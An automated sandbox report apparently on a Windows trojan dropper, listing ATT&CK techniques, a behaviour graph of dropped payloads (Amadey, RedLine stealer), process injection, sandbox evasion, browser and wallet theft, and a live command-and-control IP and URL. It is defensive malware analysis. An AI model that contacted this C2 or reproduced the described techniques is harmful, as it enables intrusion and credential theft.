                  Virtualization/Sandbox Evasion                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Access Token Manipulation                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1012
                  Process Injection                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Hidden Files and Directories                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575318 Sample: K6qneGSDSB.exe Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 82 Suricata IDS alerts for network traffic 2->82 84 Found malware configuration 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 11 other signatures 2->88 10 K6qneGSDSB.exe 2 2->10         started        process3 file4 68 C:\Users\user\Desktopbehaviorgraphrabber.exe, PE32 10->68 dropped 70 C:\Users\user\AppData\Roaming\systemsx.exe, PE32+ 10->70 dropped 13 systemsx.exe 1 2 10->13         started        17 Grabber.exe 8 10->17         started        process5 file6 72 C:\Users\user\...\616766F8886C145454191.exe, PE32+ 13->72 dropped 128 Multi AV Scanner detection for dropped file 13->128 130 Found evasive API chain (may stop execution after checking mutex) 13->130 132 Found API chain indicative of debugger detection 13->132 136 9 other signatures 13->136 19 svchost.exe 1 13->19         started        22 audiodg.exe 1 13->22         started        24 msiexec.exe 1 13->24         started        134 Detected unpacking (overwrites its own PE header) 17->134 26 cmd.exe 1 1 17->26         started        signatures7 process8 signatures9 90 Found evasive API chain (may stop execution after checking mutex) 19->90 92 Found API chain indicative of debugger detection 19->92 94 Contains functionality to inject threads in other processes 19->94 98 4 other signatures 19->98 28 explorer.exe 80 16 19->28 injected 96 Changes the view of files in windows explorer (hidden files and folders) 22->96 33 conhost.exe 26->33         started        process10 dnsIp11 80 185.81.68.147, 1912, 49704, 49705 KLNOPT-ASFI Finland 28->80 74 C:\Users\user\AppData\...\DB9C.tmp.ssg.exe, PE32 28->74 dropped 76 C:\Users\user\AppData\...\58B.tmp.zx.exe, PE32+ 28->76 dropped 78 C:\Users\user\AppData\...\12DB.tmp.update.exe, PE32+ 28->78 dropped 138 System process connects to network (likely due to code injection or exploit) 28->138 140 Benign windows process drops PE files 28->140 142 Contains functionality to inject threads in other processes 28->142 144 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->144 35 58B.tmp.zx.exe 28->35         started        39 616766F8886C145454191.exe 3 28->39         started        41 616766F8886C145454191.exe 28->41         started        43 DB9C.tmp.ssg.exe 5 4 28->43         started        file12 signatures13 process14 file15 60 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 35->60 dropped 62 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 35->62 dropped 64 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 35->64 dropped 66 47 other files (7 malicious) 35->66 dropped 100 Multi AV Scanner detection for dropped file 35->100 102 Machine Learning detection for dropped file 35->102 45 58B.tmp.zx.exe 35->45         started        104 Found evasive API chain (may stop execution after checking mutex) 39->104 106 Found API chain indicative of debugger detection 39->106 108 Contains functionality to inject threads in other processes 39->108 122 2 other signatures 39->122 47 svchost.exe 39->47         started        49 audiodg.exe 39->49         started        51 msiexec.exe 39->51         started        110 Writes to foreign memory regions 41->110 112 Allocates memory in foreign processes 41->112 124 2 other signatures 41->124 53 msiexec.exe 41->53         started        56 svchost.exe 41->56         started        58 audiodg.exe 41->58         started        114 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->114 116 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 43->116 118 Tries to harvest and steal browser information (history, passwords, etc) 43->118 120 Tries to steal Crypto Currency Wallets 43->120 signatures16 process17 signatures18 126 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 53->126

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  K6qneGSDSB.exe61%ReversingLabsWin64.Trojan.Nekark
                  K6qneGSDSB.exe100%AviraHEUR/AGEN.1317454
                  K6qneGSDSB.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe34%ReversingLabsWin64.Trojan.Amadey
                  C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe92%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                  C:\Users\user\AppData\Local\Temp\_MEI54762\VCRUNTIME140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\_bz2.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\_hashlib.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\_socket.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\libcrypto-1_1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\libffi-7.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\python38.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\select.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\ucrtbase.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\_MEI54762\unicodedata.pyd0%ReversingLabs
                  C:\Users\user\AppData\Roaming\systemsx.exe75%ReversingLabsWin64.Trojan.Midie
                  C:\Users\user\Desktop\Grabber.exe46%ReversingLabsWin32.Trojan.MintPorcupine

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://crl.mic30%Avira URL Cloudsafe
                  https://word.office.comon0%Avira URL Cloudsafe
                  http://185.81.68.147/VzCAHn.php?616766F8886C145454191100%Avira URL Cloudphishing

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.81.68.147/VzCAHn.php?616766F8886C145454191true
                  • Avira URL Cloud: phishing
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/02/sc/sctDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://duckduckgo.com/chrome_newtabDB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://tempuri.org/Entity/Id23ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://tempuri.org/Entity/Id12ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Entity/Id2ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id21ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#58B.tmp.zx.exe, 00000015.00000003.2278152704.000001AE938B6000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276633300.000001AE938BD000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2278960219.000001AE938B9000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE9384F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278097969.000001AE93855000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278032047.000001AE9382B000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE938B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id6ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Entity/Id13ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://tempuri.org/Entity/Id15ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.ip.sb/ipDB9C.tmp.ssg.exe, 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id1ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader58B.tmp.zx.exe, 00000015.00000003.2278152704.000001AE938B6000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276633300.000001AE938BD000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2278960219.000001AE938B9000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE9384F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278097969.000001AE93855000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278032047.000001AE9382B000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE938B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.datacontract.org/2004/07/System.ServiceModelDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id24ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.ecosia.org/newtab/DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id21ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.mic358B.tmp.zx.exe, 00000014.00000003.2262199311.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://tempuri.org/Entity/Id5ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id15ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://tempuri.org/Entity/Id10ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://word.office.comonexplorer.exe, 00000007.00000003.2352212980.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id8ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.microexplorer.exe, 00000007.00000000.2055981067.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3298280027.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2055093245.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/:hardwares.DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/DDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/06/addressingexDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl058B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drfalse
                                                                                                                                            		high
                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tempuri.org/Entity/Id13ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tempuri.org/Entity/Id12ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
